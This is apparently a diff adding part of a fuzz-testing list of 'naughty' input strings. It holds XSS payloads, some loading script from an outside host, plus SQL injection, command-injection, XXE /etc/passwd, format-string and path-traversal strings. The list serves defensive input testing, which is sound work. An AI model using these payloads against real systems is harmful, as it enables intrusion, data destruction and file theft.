+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x01javascript:javascript:alert(93)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x08javascript:javascript:alert(94)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(95)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(96)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(97)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x12javascript:javascript:alert(98)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Djavascript:javascript:alert(99)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Ajavascript:javascript:alert(100)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x0Cjavascript:javascript:alert(101)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x15javascript:javascript:alert(102)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(103)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x16javascript:javascript:alert(104)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x02javascript:javascript:alert(105)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Bjavascript:javascript:alert(106)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x06javascript:javascript:alert(107)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(108)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(109)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Ejavascript:javascript:alert(110)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(111)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"\\x1Cjavascript:javascript:alert(112)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x00:javascript:alert(113)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x3A:javascript:alert(114)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x09:javascript:alert(115)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x0D:javascript:alert(116)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=\"javascript\\x0A:javascript:alert(117)\" id=\"fuzzelement1\">test</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(118)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x22onerror=javascript:alert(119)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(120)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(121)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(122)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x09onerror=javascript:alert(123)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(124)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x00onerror=javascript:alert(125)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x27onerror=javascript:alert(126)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "`\"'><img src=xxx:x \\x20onerror=javascript:alert(127)>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x3Bjavascript:alert(128)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Djavascript:alert(129)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(130)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x81javascript:alert(131)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x84javascript:alert(132)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE3\\x80\\x80javascript:alert(133)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x09javascript:alert(134)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x89javascript:alert(135)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x85javascript:alert(136)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x88javascript:alert(137)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x00javascript:alert(138)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\xA8javascript:alert(139)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(140)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE1\\x9A\\x80javascript:alert(141)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Cjavascript:alert(142)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x2Bjavascript:alert(143)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(144)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>-javascript:alert(145)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Ajavascript:alert(146)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(147)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x7Ejavascript:alert(148)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x87javascript:alert(149)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(150)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\xA9javascript:alert(151)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xC2\\x85javascript:alert(152)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(153)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x83javascript:alert(154)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(155)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(156)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x80javascript:alert(157)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x21javascript:alert(158)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x82javascript:alert(159)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE2\\x80\\x86javascript:alert(160)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(161)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x0Bjavascript:alert(162)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\x20javascript:alert(163)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\"`'><script>\\xC2\\xA0javascript:alert(164)</script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x00src=x onerror=\"alert(165)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x47src=x onerror=\"javascript:alert(166)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x11src=x onerror=\"javascript:alert(167)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x12src=x onerror=\"javascript:alert(168)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x47src=x onerror=\"javascript:alert(169)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x10src=x onerror=\"javascript:alert(170)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x13src=x onerror=\"javascript:alert(171)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x32src=x onerror=\"javascript:alert(172)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x47src=x onerror=\"javascript:alert(173)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img\\x11src=x onerror=\"javascript:alert(174)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x47src=x onerror=\"javascript:alert(175)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x34src=x onerror=\"javascript:alert(176)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x39src=x onerror=\"javascript:alert(177)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img \\x00src=x onerror=\"javascript:alert(178)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x09=x onerror=\"javascript:alert(179)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x10=x onerror=\"javascript:alert(180)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x13=x onerror=\"javascript:alert(181)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x32=x onerror=\"javascript:alert(182)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x12=x onerror=\"javascript:alert(183)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x11=x onerror=\"javascript:alert(184)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x00=x onerror=\"javascript:alert(185)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src\\x47=x onerror=\"javascript:alert(186)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x09onerror=\"javascript:alert(187)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x10onerror=\"javascript:alert(188)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x11onerror=\"javascript:alert(189)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x12onerror=\"javascript:alert(190)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x\\x13onerror=\"javascript:alert(191)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(192)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x09\"javascript:alert(193)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x10\"javascript:alert(194)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x11\"javascript:alert(195)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x12\"javascript:alert(196)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x32\"javascript:alert(197)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=x onerror=\\x00\"javascript:alert(198)\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(199)>XXX</a>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src=\"x` `<script>javascript:alert(200)</script>\"` `>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<img src onerror /\" '\"= alt=javascript:alert(201)//\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<title onpropertychange=javascript:alert(202)></title><title title=>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(203)></a>\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<!--[if]><script>javascript:alert(204)</script -->"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<!--[if<img src=x onerror=javascript:alert(205)//]> -->"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script src=\"/\\%(jscript)s\"></script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<script src=\"\\\\%(jscript)s\"></script>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG \"\"\"><SCRIPT>alert(\"206\")</SCRIPT>\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=javascript:alert(String.fromCharCode(50,48,55))>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=# onmouseover=\"alert('208')\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC= onmouseover=\"alert('209')\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG onmouseover=\"alert('210')\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#50;&#49;&#49;&#39;&#41;>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000050&#0000049&#0000050&#0000039&#0000041>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x32&#x31&#x33&#x27&#x29>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav   ascript:alert('214');\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav&#x09;ascript:alert('215');\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav&#x0A;ascript:alert('216');\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"jav&#x0D;ascript:alert('217');\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"218\\\")>\";' > out"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\" &#14;  javascript:alert('219');\">"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"220\")>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<<SCRIPT>alert(\"221\");//<</SCRIPT>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<SCRIPT SRC=//ha.ckers.org/.j>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<IMG SRC=\"javascript:alert('222')\""
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<iframe src=http://ha.ckers.org/scriptlet.html <"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "\\\";alert('223');//"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<u oncopy=alert()> Copy me</u>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<i onwheel=alert(224)> Scroll over me </i>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "<plaintext>"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "http://a/%%30%30"
+  },
+  {
+    "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+    "string": "</textarea><script>alert(225)</script>"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "1;DROP TABLE users"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "1'; DROP TABLE users-- 1"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "' OR 1=1 -- 1"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "' OR '1'='1"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "%"
+  },
+  {
+    "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+    "string": "_"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "-"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "--"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "--version"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "--help"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "$USER"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "/dev/null; touch /tmp/blns.fail ; echo"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "`touch /tmp/blns.fail`"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "$(touch /tmp/blns.fail)"
+  },
+  {
+    "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+    "string": "@{[system \"touch /tmp/blns.fail\"]}"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "eval(\"puts 'hello world'\")"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "System(\"ls -al /\")"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "`ls -al /`"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "Kernel.exec(\"ls -al /\")"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "Kernel.exit(1)"
+  },
+  {
+    "category": "Strings which can call system commands within Ruby/Rails applications",
+    "string": "%x('ls -al /')"
+  },
+  {
+    "category": "String which can reveal system files when parsed by a badly configured XML parser",
+    "string": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "$HOME"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "$ENV{'HOME'}"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%d"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%s%s%s%s%s"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "{0}"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%*.*s"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%@"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "%n"
+  },
+  {
+    "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+    "string": "File:///"
+  },
+  {
+    "category": "Strings which can cause user to pull in files that should not be a part of a web server",
+    "string": "../../../../../../../../../../../etc/passwd%00"
+  },
+  {
+    "category": "Strings which can cause user to pull in files that should not be a part of a web server",
+    "string": "../../../../../../../../../../../etc/hosts"
+  },
